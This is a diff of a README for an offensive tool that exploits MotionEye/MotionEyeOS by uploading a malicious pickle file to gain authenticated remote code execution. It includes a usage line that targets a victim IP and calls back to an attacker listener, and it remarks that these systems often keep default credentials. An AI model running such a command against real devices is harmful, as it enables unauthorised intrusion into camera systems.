pizza-power/motioneye-authenticated-RCE/README.md

 # MotionEye/MotionEyeOS Authenticated RCE
-A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye
+A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye.
+You need administrator credentials, so it should not be that big of a deal.
+Unfortunately, MotionEye/MotionEye tend to be ran with default credentials.
 Example:

 main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444